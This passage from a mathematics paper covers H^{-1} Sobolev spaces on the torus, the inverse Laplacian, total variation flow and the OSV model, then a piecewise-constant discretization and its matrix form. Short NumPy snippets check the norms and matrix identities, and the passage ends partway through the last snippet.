H^1(\mathbb{T}) = \left\{f\in L^2(\mathbb{T}) : \displaystyle\sum_{\xi\in\mathbb{Z}}\xi^2|\widehat{f}_T(\xi)|^2<\infty\right\}=\left\{f\in \mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\in\mathbb{Z}}(1+\xi^2)|\widehat{f}_T(\xi)|^2<\infty\right\},
\end{equation}
\begin{equation}
\label{Def:H-1T}
H^{-1}(\mathbb{T}) = \left\{f\in\mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\in\mathbb{Z}}(1+\xi^2)^{-1}|\widehat{f}_T(\xi)|^2<\infty\right\}.
\end{equation}
Note that the duality pairing can be described formally as
\begin{equation}
\langle f,g\rangle_{H^{-1}(\mathbb{T}),H^1(\mathbb{T})} = \displaystyle\sum_{\xi\in\mathbb{Z}}\widehat{f}_T(\xi)\overline{\widehat{g}_T(\xi)} = \displaystyle\int_{\mathbb{T}}f(x)\overline{g(x)}~dx
\end{equation}
for all $f\in H^{-1}(\mathbb{T})$ and $g\in H^1(\mathbb{T})$.
\subsection{The inverse Laplacian $(-\Delta_{\mathrm{av}})^{-1}$}
We consider the functions on $\mathbb{T}$ whose average are equal to zero. Let
\begin{subequations}
\begin{align}
L^2_{\mathrm{av}}(\mathbb{T}) &= \left\{f\in L^2(\mathbb{T}) : \displaystyle\int_{\mathbb{T}}f(x)~dx=0\right\},\\
H^1_{\mathrm{av}}(\mathbb{T}) &= L^2_{\mathrm{av}}(\mathbb{T})\cap H^1(\mathbb{T}) = \left\{f\in H^1(\mathbb{T}) : \displaystyle\int_{\mathbb{T}}f(x)~dx = 0\right\},\\
H^{-1}_{\mathrm{av}}(\mathbb{T}) &= \left\{f\in H^{-1}(\mathbb{T}) : \langle f,1\rangle_{H^{-1}(\mathbb{T}),H^1(\mathbb{T})} =0\right\}.
\end{align}
\end{subequations}
These definitions agree with the following ones:
\begin{equation}
L^2_{\mathrm{av}}(\mathbb{T}) = \left\{f\in \mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\neq0}|\widehat{f}_T(\xi)|^2<\infty\mbox{ and }\widehat{f}_T(0)=0\right\},
\end{equation}
\begin{equation}
H^1_{\mathrm{av}}(\mathbb{T}) = \left\{f\in\mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\neq0}\xi^2|\widehat{f}_T(\xi)|^2<\infty\mbox{ and }\widehat{f}_T(0) = 0\right\},
\end{equation}
\begin{equation}
H^{-1}_{\mathrm{av}}(\mathbb{T}) = \left\{f\in\mathcal{D}'(\mathbb{T}) : \displaystyle\sum_{\xi\neq0}\xi^{-2}|\widehat{f}_T(\xi)|^2<\infty\mbox{ and }\widehat{f}_T(0) = 0\right\}.
\end{equation}
It is easy to check that each of these spaces is a Hilbert space endowed with the inner products
\begin{subequations}
\begin{align}
(f,g)_{L^2_{\mathrm{av}}(\mathbb{T})}&=\displaystyle\sum_{\xi\neq0}\widehat{f}_T(\xi)\overline{\widehat{g}_T(\xi)},\\
(f,g)_{H^1_{\mathrm{av}}(\mathbb{T})}&=\displaystyle\sum_{\xi\neq0}4\pi^2\xi^2\widehat{f}_T(\xi)\overline{\widehat{g}_T(\xi)},\\
(f,g)_{H^{-1}_{\mathrm{av}}(\mathbb{T})}&=\displaystyle\sum_{\xi\neq0}\dfrac{1}{4\pi^2}\xi^{-2}\widehat{f}_T(\xi)\overline{\widehat{g}_T(\xi)},
\end{align}
\end{subequations}
respectively. These inner products introduce the norms $\|\cdot\|_{L^2_{\mathrm{av}}(\mathbb{T})}$, $\|\cdot\|_{H^1_{\mathrm{av}}(\mathbb{T})}$ and $\|\cdot\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}$. It is easy to check that
\begin{alignat}{2}
\|f\|_{L^2_{\mathrm{av}}(\mathbb{T})}&=\|f\|_{L^2(\mathbb{T})} &\qquad\mbox{for all }f\in L^2_{\mathrm{av}}(\mathbb{T}),\\
\|f\|_{H^1_{\mathrm{av}}(\mathbb{T})} &= \|df/dx\|_{L^2(\mathbb{T})} &\qquad\mbox{for all }f\in H^1_{\mathrm{av}}(\mathbb{T}).
\end{alignat}
Fix $u\in H^1_{\mathrm{av}}(\mathbb{T})$ arbitrarily. Let $c(\xi) = 4\pi^2\xi^2\widehat{u}_T(\xi)\in\mathbb{C}$ and $f(x) = \sum_{\xi\in\mathbb{Z}}c(\xi)e^{2\pi i\xi x}$, then we have $c(0)=0$ and $\sum_{\xi\neq0}\xi^{-2}|c(\xi)|^2 = 16\pi^4\sum_{\xi\neq0}\xi^2|\widehat{u}_T(\xi)|^2<\infty$. This implies $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$. Moreover,
\begin{equation}
-\Delta u(x) = \displaystyle\sum_{\xi\in\mathbb{Z}}\widehat{(-\Delta u)}_T(\xi)e^{2\pi i\xi x}
=\displaystyle\sum_{\xi\in\mathbb{Z}}4\pi^2\xi^2\widehat{u}_T(\xi)e^{2\pi i\xi x} = f(x),
\end{equation}
where $-\Delta u = -d^2u/dx^2$. Conversely, every $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ is obtained in this way, so the correspondence $f\mapsto u$ defines the operator $(-\Delta_{\mathrm{av}})^{-1}:H^{-1}_{\mathrm{av}}(\mathbb{T})\to H^1_{\mathrm{av}}(\mathbb{T})$. We call this operator the \textit{inverse Laplacian}.
Let $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ and $u=(-\Delta_{\mathrm{av}})^{-1}f\in H^1_{\mathrm{av}}(\mathbb{T})$; then we have
\begin{align*}
\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 &= \|-\Delta u\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\\
&= \displaystyle\sum_{\xi\neq0}\dfrac{1}{4\pi^2}\xi^{-2}\widehat{(-\Delta u)}_T(\xi)\overline{\widehat{(-\Delta u)}_T(\xi)}\\
&= \displaystyle\sum_{\xi\neq0}4\pi^2\xi^2|\widehat{u}_T(\xi)|^2 = \|u\|_{H^1_{\mathrm{av}}(\mathbb{T})}^2.
\end{align*}
This implies
\begin{equation}
\label{Lem:H-1av_norm}
\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})} =\|(-\Delta_{\mathrm{av}})^{-1}f\|_{H^1_{\mathrm{av}}(\mathbb{T})}= \|\nabla (-\Delta_{\mathrm{av}})^{-1}f\|_{L^2(\mathbb{T})}
\end{equation}
for all $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$, where $\nabla = d/dx$.
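In practice the norm in \eqref{Lem:H-1av_norm} is easy to evaluate from the Fourier characterization $\|f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2=\sum_{\xi\neq0}|\widehat{f}_T(\xi)|^2/(4\pi^2\xi^2)$. The following Python sketch illustrates this; the FFT-based sampling and the function name are our own choices, not part of the schemes below:

```python
import numpy as np

def h_minus1_av_norm(f_samples):
    """H^{-1}_av norm of a mean-zero function sampled at N uniform points of [0,1)."""
    N = len(f_samples)
    coeffs = np.fft.fft(f_samples) / N        # approximate Fourier coefficients f_hat(xi)
    xi = np.fft.fftfreq(N, d=1.0 / N)         # integer frequencies xi
    mask = xi != 0                            # drop the zero mode (the average vanishes)
    return np.sqrt(np.sum(np.abs(coeffs[mask])**2 / (4 * np.pi**2 * xi[mask]**2)))

x = np.arange(64) / 64
f = np.cos(2 * np.pi * x)                     # only the modes xi = ±1 contribute
print(h_minus1_av_norm(f))                    # analytic value: 1/(2*pi*sqrt(2))
```

For $f(x)=\cos(2\pi x)$ we have $\widehat{f}_T(\pm1)=1/2$, so the norm equals $1/(2\pi\sqrt{2})$, which the discrete transform reproduces up to machine precision since $f$ is a single harmonic.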
\subsection{Bounded variation and $H^{-1}$ fidelity for the torus $\mathbb{T}$}
We recall the space of functions of \textit{bounded variation} on the one-dimensional torus.
\begin{definition}[Definition 3.3.13 of \cite{Gra14a}]
For a measurable function $f$ on $\mathbb{T}$ which is defined everywhere, we define the \textit{total variation} as
\begin{equation}
\displaystyle\int_{\mathbb{T}}|Df| = \operatorname{ess} \sup\left\{\displaystyle\sum_{j=1}^M|f(x_j)-f(x_{j-1})| : 0=x_0<x_1<\dots<x_M=1\right\},
\end{equation}
where the supremum is taken over all partitions of the interval $[0,1]$.
We say that $f$ is of \textit{bounded variation} if its total variation is finite.
Moreover, we define
\begin{equation}
BV(\mathbb{T}) = \left\{v\in \mathcal{D}'(\mathbb{T}) : \displaystyle\int_{\mathbb{T}}|Df|<\infty\right\}.
\end{equation}
\end{definition}
\begin{remark}
In the definition, $D$ can be regarded as the distributional derivative, and $Df$ can be identified with a signed Borel measure.
\end{remark}
\begin{remark}
The total variation on a general open set $\Omega\subset \mathbb{R}^d$ is defined as
\begin{equation}
\displaystyle\int_{\Omega}|Dv| = \sup\left\{-\int_{\Omega}v(x)\operatorname{div}\phi(x)~dx : \phi\in C^{\infty}_0(\Omega;\mathbb{R}^d)\mbox{ and }\|\phi\|_{L^{\infty}(\Omega)}\le1\right\},
\end{equation}
and the space of bounded variation is defined as
\begin{equation}
BV(\Omega) = \left\{v\in L^1(\Omega) : \displaystyle\int_{\Omega}|Dv|<\infty\right\}.
\end{equation}
It is well-known that if $v\in W^{1,1}(\Omega)$, then
\begin{equation}
\displaystyle\int_{\Omega}|Dv| = \int_{\Omega}|\nabla v|~dx = |v|_{W^{1,1}(\Omega)},
\end{equation}
and therefore $W^{1,1}(\Omega)\subset BV(\Omega)\subset L^1(\Omega)$.
\end{remark}
We define the functional $\Phi:H^{-1}_{\mathrm{av}}(\mathbb{T})\to \mathbb{R}\cup\{\infty\}$ as
\begin{equation}
\Phi(v) =\left\{\begin{array}{ll}
\displaystyle\int_{\mathbb{T}}|Dv|&\mbox{if }v\in BV(\mathbb{T})\cap H^{-1}_{\mathrm{av}}(\mathbb{T}),\\
\infty&\mbox{otherwise.}\end{array}\right.
\end{equation}
Note that $\Phi:H^{-1}_{\mathrm{av}}(\mathbb{T})\to \mathbb{R}\cup\{\infty\}$ is nonnegative, proper, lower semi-continuous and convex. In this paper, we consider the gradient flow equation of the form
\begin{equation}
\label{Eq:GradientFlow}
(\mbox{gradient flow})\left\{\begin{array}{rll}
\dfrac{du}{dt}(t) &\in-\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}\Phi(u(t))&\mbox{for a.e. }t>0,\\
u(0) &=u_0\in H^{-1}_{\mathrm{av}}(\mathbb{T}),&
\end{array}\right.
\end{equation}
where the subdifferential $\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}$ is defined as
\begin{equation}
\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}F(u) = \left\{p\in H^{-1}_{\mathrm{av}}(\mathbb{T}) : F(v)-F(u)\ge (p,v-u)_{H^{-1}_{\mathrm{av}}(\mathbb{T})} \mbox{ for all }v\in H^{-1}_{\mathrm{av}}(\mathbb{T})\right\}
\end{equation}
for any convex functional $F:H^{-1}_{\mathrm{av}}(\mathbb{T})\to \mathbb{R}\cup\{\infty\}$ and $u\in H^{-1}_{\mathrm{av}}(\mathbb{T})$. It is well known that the theory of maximal monotone operators gives the existence and uniqueness of a solution $u\in C([0,\infty),H^{-1}_{\mathrm{av}}(\mathbb{T}))$ to equation \eqref{Eq:GradientFlow} (for example, see \cite{Kom67}).
Let $\tau>0$ be the temporal step size. We consider the backward Euler method for gradient flow equation \eqref{Eq:GradientFlow}; for given $u^k\in H^{-1}_{\mathrm{av}}(\mathbb{T})$, find $u^{k+1}\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ such that
\begin{equation}
\dfrac{u^{k+1}-u^k}{\tau}
\in -\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}\Phi(u^{k+1}).
\end{equation}
This can be reduced to solving the following minimization problem:
\begin{equation}
\label{Eq:BackEuler}
u^{k+1} = \displaystyle\mathop{\mathrm{argmin}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{ \Phi(u)+\dfrac{1}{2\tau}\|u-u^k\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\right\}.
\end{equation}
Since the functional in \eqref{Eq:BackEuler} is strictly convex, owing to the squared-norm term, such $u^{k+1}$ is uniquely determined.
The convergence of the backward Euler method has been proved in \cite{Kom67}.
Note that equation \eqref{Eq:BackEuler} is similar to the OSV model \cite{OSV03} which can be described as
\begin{equation}
\label{Problem:OSV}
(\mbox{OSV})\left\{\begin{array}{l}
\mbox{Find $u\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ such that}\\
u = \mathop{\mathrm{argmin}}_{v\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\Phi(v) + \dfrac{\lambda}{2}\|v-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\right\},
\end{array}\right.
\end{equation}
where $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ is given data and $\lambda>0$ is an artificial parameter.
A standard existence result in convex analysis (for example, see \cite[Cor3.23]{Bre11}) shows that a minimizer $u\in BV(\mathbb{T})\cap H^{-1}_{\mathrm{av}}(\mathbb{T})$ exists.
Hereafter, we consider the following minimization problem: find $u\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ such that
\begin{equation}
(\mathrm{P}0)\quad \displaystyle\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\Phi(u)+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\right\},
\end{equation}
where $f\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ is given data or $f=u^k$, and $\lambda$ is a given parameter or $\lambda = 1/\tau$.
This covers both (OSV) and the backward Euler method for (gradient flow).
Furthermore, $(\mbox{P}0)$ leads to the following constrained problem:
\begin{equation}
\label{Eq:Constrained}
(\mathrm{P}1)\quad \displaystyle\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\displaystyle\int_{\mathbb{T}}|d|+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 : d=Du\right\}.
\end{equation}
\begin{remark}
When we consider Spohn's model
\begin{equation}
u_t = -\Delta\left(\operatorname{div}\left(\beta\dfrac{\nabla u}{|\nabla u|}+|\nabla u|^{p-2}\nabla u\right)\right),
\end{equation}
the subdifferential formulation is given as $u_t \in -\partial_{H^{-1}_{\mathrm{av}}(\mathbb{T})}\widetilde{\Phi}(u)$, where
\begin{equation}
\widetilde{\Phi}(u) = \beta\displaystyle\int_{\mathbb{T}}|Du| + \dfrac{1}{p}\int_{\mathbb{T}}|Du|^p.
\end{equation}
Therefore the backward Euler method yields
\begin{equation}
u^{k+1} = \mathop{\mathrm{argmin}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\widetilde{\Phi}(u)+\dfrac{1}{2\tau}\|u-u^k\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2\right\}.
\end{equation}
Then we consider the constrained problem
\begin{equation}
\mathop{\mathrm{minimize}}_{u\in H^{-1}_{\mathrm{av}}(\mathbb{T})}\left\{\beta\displaystyle\int_{\mathbb{T}}|d|+\dfrac{1}{p}\int_{\mathbb{T}}|d|^p + \dfrac{\lambda}{2}\|u-f\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 : d=Du\right\}.
\end{equation}
\end{remark}
\section{Discretization for total variation flow and OSV model}
\label{Sec:Discrete}
\subsection{Discretization for minimization problem}
We introduce the (spatial) discretization for the problem $(\mbox{P}1)$. Let $N\in\mathbb{N}$ be the partition number, $h=1/N$ and $x_n = nh$. We regard $x_0 = x_N$, so that $\{x_n\}_{n=0}^N$ gives a uniform partition of $\mathbb{T}$. Furthermore, we let $x_{n+1/2} = (x_n+x_{n+1})/2 = (n+1/2)h$ for $n = -1,0,\dots, N$, where $x_{-1/2}$ and $x_{N+1/2}$ are identified with $x_{N-1/2}$ and $x_{1/2}$, respectively. Then we define the following spaces of piecewise constant functions:
\begin{subequations}
\begin{align}
V_{h} &= \left\{v_h:\mathbb{T}\to\mathbb{R} : v_h|_{I_n}\in \mathbb{P}_0(I_n)\mbox{ for all }n=1,\dots,N\right\},\\
V_{h0} &= \left\{v_h = \displaystyle\sum_{n=1}^Nv_n\boldsymbol{1}_{I_n}\in V_h : \displaystyle\sum_{n=1}^Nv_n = 0\right\},\\
\widehat{V}_{h} &= \{d_h:I\to\mathbb{R} : d_h|_{[x_{n-1},x_n)}\in\mathbb{P}_0([x_{n-1},x_n))\mbox{ for all }n=1,\dots,N\},
\end{align}
\end{subequations}
where $I=[0,1]$, $I_n = [x_{n-1/2},x_{n+1/2})$, $\mathbb{P}_0(I_n)$ is the space of constant functions on the interval $I_n$ and $\boldsymbol{1}_{I_{n}}$ is its characteristic function.
Note that $V_{h0}$ is a finite dimensional subspace of $H^{-1}_{\mathrm{av}}(\mathbb{T})$.
Furthermore, we define $D_h:V_{h0}\to\widehat{V}_h\cap L^2_{\mathrm{av}}(I)$ as
\begin{equation}
D_hv_h = \displaystyle\sum_{n=1}^N(v_{n}-v_{n-1})\boldsymbol{1}_{[x_{n-1},x_n)},
\end{equation}
where $v_0$ is identified with $v_N$.
Let $d_h=D_hv_h\in\widehat{V}_h$, $\textbf{d} = (d_1,\dots, d_N)^{\mathrm{T}}\in\mathbb{R}^N$ for $d_h=\sum_{n=1}^Nd_n\boldsymbol{1}_{[x_{n-1},x_n)}$, $\widetilde{\textbf{v}} = (v_1,v_2,\dots, v_{N})^{\mathrm{T}}\in\mathbb{R}^N$ for $v_h=\sum_{n=1}^Nv_n\boldsymbol{1}_{I_n}\in V_{h0}$, then we have
\begin{equation}
\Phi(v_h) = \dfrac{\|D_hv_h\|_{L^1(I)}}{h} = \dfrac{\|d_h\|_{L^1(I)}}{h} = h\|\nabla_h\widetilde{\textbf{v}}\|_1 = \|\textbf{d}\|_1,
\end{equation}
where $\nabla_h:\mathbb{R}^N\to\mathbb{R}^N$ is the discrete gradient
\begin{equation}
\nabla_h = h^{-1}\begin{pmatrix}
1&0&\dots&0&-1\\
-1&1&\dots&0&0\\
\vdots&&\ddots&&\vdots\\
0&0&\dots&-1&1
\end{pmatrix}\in\mathbb{R}^{N\times N}.
\end{equation}
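The matrix $S_N=h\nabla_h$ and the discrete total variation $\Phi(v_h)=\|\textbf{d}\|_1$ are straightforward to assemble. The following sketch (the helper name is ours) builds the periodic difference matrix and evaluates the total variation of sampled data:

```python
import numpy as np

def forward_diff_matrix(N):
    """Periodic difference matrix S_N: (S_N v)_n = v_n - v_{n-1} with v_0 = v_N."""
    return np.eye(N) - np.roll(np.eye(N), -1, axis=1)

N = 8
h = 1.0 / N
S = forward_diff_matrix(N)                    # S_N
grad_h = S / h                                # discrete gradient nabla_h
v = np.sin(2 * np.pi * np.arange(N) / N)      # periodic, mean-zero samples
d = S @ v                                     # d = D_h v_h, so Phi(v_h) = ||d||_1
print(np.linalg.norm(d, 1))                   # prints 4.0 = 2 * (max - min)
```

For the sampled sine the discrete total variation equals twice its oscillation, $2(\max v-\min v)=4$, as expected for a periodic function that increases once and decreases once per period.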
Note that $D_hv_h\in \widehat{V}_h\cap L^2_{\mathrm{av}}(I)\subset L^2_{\mathrm{av}}(I)$ for all $v_h\in V_{h0}$; however, $D_hv_h\not\in H^{-1}_{\mathrm{av}}(\mathbb{T})$ in general, because it need not satisfy the periodic boundary condition (see Figure \ref{Fig:vh_and_Dhvh}).
\begin{figure}[tb]
\centering
\includegraphics[clip,scale=.7]{plot_V0h.pdf}
\includegraphics[clip,scale=.7]{plot_widehatVh.pdf}
\caption{An example of $v_h\in V_{h0}$ and $D_hv_h\in \widehat{V}_h$.}
\label{Fig:vh_and_Dhvh}
\end{figure}
Here we introduce the discretized problem for $(\mbox{P}1)$:
\begin{equation}
(\mathrm{P}1)_h\quad \displaystyle\mathop{\mathrm{minimize}}_{u_h\in V_{h0}}\left\{\|\textbf{d}\|_1 + \dfrac{\lambda}{2}\|u_h-f_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 : d_h = D_h u_h\in \widehat{V}_h\right\},
\end{equation}
where $f_h\in V_{h0}$ is given data or $f_h=u_h^k$, and $\textbf{d} = (d_1,\dots, d_N)^{\mathrm{T}}$ for $d_h=\sum_{n=1}^Nd_n\boldsymbol{1}_{[x_{n-1},x_n)}$.
Furthermore, we introduce the unconstrained problem
\begin{equation}
(\mathrm{P}2)_h\quad \displaystyle\mathop{\mathrm{minimize}}_{u_h\in V_{h0}, d_h\in\widehat{V}_h}\left\{\|\textbf{d}\|_1 + \dfrac{\lambda}{2}\|u_h-f_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 + \dfrac{\mu}{2}\|d_h - D_h u_h\|_{L^2(I)}^2\right\}.
\end{equation}
\begin{remark}
In this paper, we use the penalty $\|d_h-D_hu_h\|_{L^2(I)}^2$. This enables us to apply the shrinking method to the minimization problem in the split Bregman framework.
\end{remark}
\subsection{Corresponding matrix form}
We reduce $(\mathrm{P}2)_h$ to the matrix formulation. Let $\textbf{d} = (d_1,\dots, d_N)^{\mathrm{T}}\in\mathbb{R}^N$ for $d_h=\sum_{n=1}^Nd_n\boldsymbol{1}_{[x_{n-1},x_n)}$, $\widetilde{\textbf{u}} = (u_1,\dots, u_N)^{\mathrm{T}}\in\mathbb{R}^N$ and $\textbf{u}=(u_1,\dots,u_{N-1})^{\mathrm{T}}\in\mathbb{R}^{N-1}$ for $u_h = \sum_{n=1}^Nu_n\boldsymbol{1}_{I_n}\in V_{h0}$, then we have
\begin{equation}
d_h-D_hu_h = \displaystyle\sum_{n=1}^N(d_n-(u_n-u_{n-1}))\boldsymbol{1}_{[x_{n-1},x_n)} = (\textbf{d}-S\widetilde{\textbf{u}})\cdot(\boldsymbol{1}_{[x_0,x_1)},\dots, \boldsymbol{1}_{[x_{N-1},x_N)})^{\mathrm{T}},
\end{equation}
where $S_N=h\nabla_h\in\mathbb{R}^{N\times N}$.
Furthermore, $u_h\in V_{h0}$ implies $u_N = -\sum_{n=1}^{N-1}u_n$, that is, $\widetilde{\textbf{u}} = R_N\textbf{u}$, where
\begin{equation}
\label{Def:R}
R_N = \begin{pmatrix}
1&0&\dots&0&\\
0&1&\dots&0&\\
\vdots&&\ddots&\vdots\\
0&0&\dots&1\\
-1&-1&\dots&-1
\end{pmatrix}\in\mathbb{R}^{N\times(N-1)}.
\end{equation}
Therefore
\begin{equation}
\label{Eq:L2_part}
\dfrac{\mu}{2}\|d_h-D_hu_h\|_{L^2(I)}^2
= \dfrac{\mu h}{2}\|\textbf{d}-S_NR_N\textbf{u}\|_2^2.
\end{equation}
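The reduction $\widetilde{\textbf{u}} = R_N\textbf{u}$ simply appends the dependent last component. A minimal check (the function name is ours) that the lifted vector always has zero sum:

```python
import numpy as np

def lift_matrix(N):
    """The matrix R_N: lift u in R^{N-1} to the zero-sum vector (u, -sum(u))."""
    return np.vstack([np.eye(N - 1), -np.ones((1, N - 1))])

R = lift_matrix(5)
u = np.array([1.0, 2.0, -0.5, 3.0])
u_tilde = R @ u
print(u_tilde)        # last entry is -(1 + 2 - 0.5 + 3) = -5.5
```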
Next, we consider two expressions of $\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2$ for $v_h\in V_{h0}$. Recall that equation \eqref{Lem:H-1av_norm} implies
\begin{equation}
\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 = \|\nabla(-\Delta_{\mathrm{av}})^{-1}v_h\|_{L^2(\mathbb{T})}^2.
\end{equation}
We propose two schemes for considering $\nabla(-\Delta_{\mathrm{av}})^{-1}$. The first scheme is to approximate $\nabla(-\Delta_{\mathrm{av}})^{-1}$ by using the discrete gradient $\nabla_h\in\mathbb{R}^{N\times N}$ and the discrete Laplacian
\begin{equation}
-\Delta_h = \nabla_h^{\mathrm{T}}\nabla_h = h^{-2}S_N^{\mathrm{T}}S_N = h^{-2}
\begin{pmatrix}
2&-1&0&\dots&-1\\
-1&2&-1&\dots&0\\
\vdots&&\ddots&&\vdots\\
-1&0&0&\dots&2
\end{pmatrix}\in\mathbb{R}^{N\times N}.
\end{equation}
Let $\widetilde{\textbf{v}} = (v_1,v_2,\dots, v_{N})^{\mathrm{T}}\in\mathbb{R}^N$ and $\textbf{v}=(v_1,\dots,v_{N-1})^{\mathrm{T}}\in\mathbb{R}^{N-1}$ for $v_h\in V_{h0}$, then $\widetilde{\textbf{v}}=R_N\textbf{v}$.
We define $\textbf{w}\in\mathbb{R}^{N-1}$ and $\widetilde{\textbf{w}}\in\mathbb{R}^N$ for $w_h\in V_{h0}$ in the same way. Letting $\widetilde{\textbf{v}}= -\Delta_h\widetilde{\textbf{w}}$ implies
\begin{equation}
R_N\textbf{v} = -\Delta_hR_N\textbf{w}.
\end{equation}
Multiplying by the (unique Moore--Penrose) pseudo-inverse matrix of $R_N$,
\begin{equation}
L_N = \dfrac{1}{N}\begin{pmatrix}
N-1&-1&\dots&-1&-1\\
-1&N-1&\dots&-1&-1\\
\vdots&&\ddots&&\vdots\\
-1&-1&\dots&N-1&-1
\end{pmatrix}\in\mathbb{R}^{(N-1)\times N}
\end{equation}
yields $\textbf{v} = L_N(-\Delta_h)R_N\textbf{w} = h^{-2}L_NS_N^{\mathrm{T}}S_NR_N\textbf{w}$. For simplicity of notation, we let
\begin{subequations}
\begin{align}
A_N &= L_NS_N^{\mathrm{T}}S_NR_N,\\
(-\Delta_{\mathrm{av}})_h &= h^{-2}A_N = L_N(-\Delta_h)R_N.
\end{align}
\end{subequations}
It is easy to check that
\begin{equation}
A_N = \begin{pmatrix}
3&0&1&1&\dots&1&1&1\\
-1&2&-1&0&\dots&0&0&0\\
0&-1&2&-1&\dots&0&0&0\\
\vdots&&&\ddots&&&\vdots\\
0&0&0&0&\dots&-1&2&-1\\
1&1&1&1&\dots&1&0&3
\end{pmatrix}
\in \mathbb{R}^{(N-1)\times(N-1)}
\end{equation}
satisfies $\det A_N=N^2\neq0$; therefore the matrix $(-\Delta_{\mathrm{av}})_h=h^{-2}A_N$ is invertible.
This implies
\begin{equation}
\left\{\begin{array}{rl}
\widetilde{\textbf{v}} &= -\Delta_h\widetilde{\textbf{w}},\\
\widetilde{\textbf{w}}&= R_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}.
\end{array}\right.
\end{equation}
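These algebraic identities are easy to verify numerically. The sketch below (helper names are ours) assembles $S_N$, $R_N$, $L_N$ and $A_N=L_NS_N^{\mathrm{T}}S_NR_N$, and checks that $L_N$ is a left inverse of $R_N$ and that $\det A_N=N^2$:

```python
import numpy as np

def build_matrices(N):
    """Assemble S_N, R_N, L_N and A_N = L_N S_N^T S_N R_N."""
    S = np.eye(N) - np.roll(np.eye(N), -1, axis=1)              # S_N
    R = np.vstack([np.eye(N - 1), -np.ones((1, N - 1))])        # R_N
    L = (np.hstack([np.eye(N - 1), np.zeros((N - 1, 1))])
         - np.ones((N - 1, N)) / N)                             # L_N (pseudo-inverse)
    return S, R, L, L @ S.T @ S @ R

for N in (4, 7, 12):
    S, R, L, A = build_matrices(N)
    print(N, np.allclose(L @ R, np.eye(N - 1)), np.linalg.det(A))
```

The determinant identity reflects a classical fact: the product of the nonzero eigenvalues of the discrete Laplacian of the cycle graph on $N$ vertices is $N^2$, and $A_N$ represents $S_N^{\mathrm{T}}S_N$ restricted to the zero-mean subspace.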
Our first scheme is to approximate $(-\Delta_{\mathrm{av}})^{-1}$ by $R_N(-\Delta_{\mathrm{av}})_h^{-1}$, instead of $(-\Delta_h)^{-1}$ which does not exist. This yields
\begin{equation}
\nabla(-\Delta_{\mathrm{av}})^{-1}v_h\approx(\nabla_hR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v})\cdot(\boldsymbol{1}_{[x_0,x_1)},\dots,\boldsymbol{1}_{[x_{N-1},x_N)})^{\mathrm{T}},
\end{equation}
that is,
\begin{align*}
\|\nabla(-\Delta_{\mathrm{av}})^{-1}v_h\|_{L^2(I)}^2 &\approx \left\|\left(\nabla_hR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}\right)\cdot(\boldsymbol{1}_{[x_0,x_1)},\dots,\boldsymbol{1}_{[x_{N-1},x_N)})\right\|_{L^2(I)}^2\\
&= h\|\nabla_hR_N(-\Delta_{\mathrm{av}})_h^{-1}\textbf{v}\|_2^2\\
&= h^3\|S_NR_NA_N^{-1}\textbf{v}\|_2^2.
\end{align*}
For simplicity, we let $J = S_NR_NA_N^{-1}\in\mathbb{R}^{N\times(N-1)}$, then our first scheme can be described as
\begin{equation}
\label{Eq:H-1_part1}
\dfrac{\lambda}{2}\|v_h\|_{H^{-1}_{\mathrm{av}}(\mathbb{T})}^2 \approx \dfrac{\lambda h^3}{2}\|J\textbf{v}\|_2^2
\end{equation}
for all $v_h\in V_{h0}$.
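To see that \eqref{Eq:H-1_part1} is a reasonable approximation, one can compare $h^3\|J\textbf{v}\|_2^2$ with the continuum norm for a single Fourier mode. A sketch (the test function, grid size and tolerance are our choices):

```python
import numpy as np

def scheme1_norm_sq(v_red, N):
    """First scheme: approximate ||v_h||^2_{H^{-1}_av} by h^3 ||J v||_2^2
       with J = S_N R_N A_N^{-1}."""
    h = 1.0 / N
    S = np.eye(N) - np.roll(np.eye(N), -1, axis=1)
    R = np.vstack([np.eye(N - 1), -np.ones((1, N - 1))])
    L = (np.hstack([np.eye(N - 1), np.zeros((N - 1, 1))])
         - np.ones((N - 1, N)) / N)
    A = L @ S.T @ S @ R
    J = S @ R @ np.linalg.inv(A)
    return h**3 * np.sum((J @ v_red)**2)

N = 64
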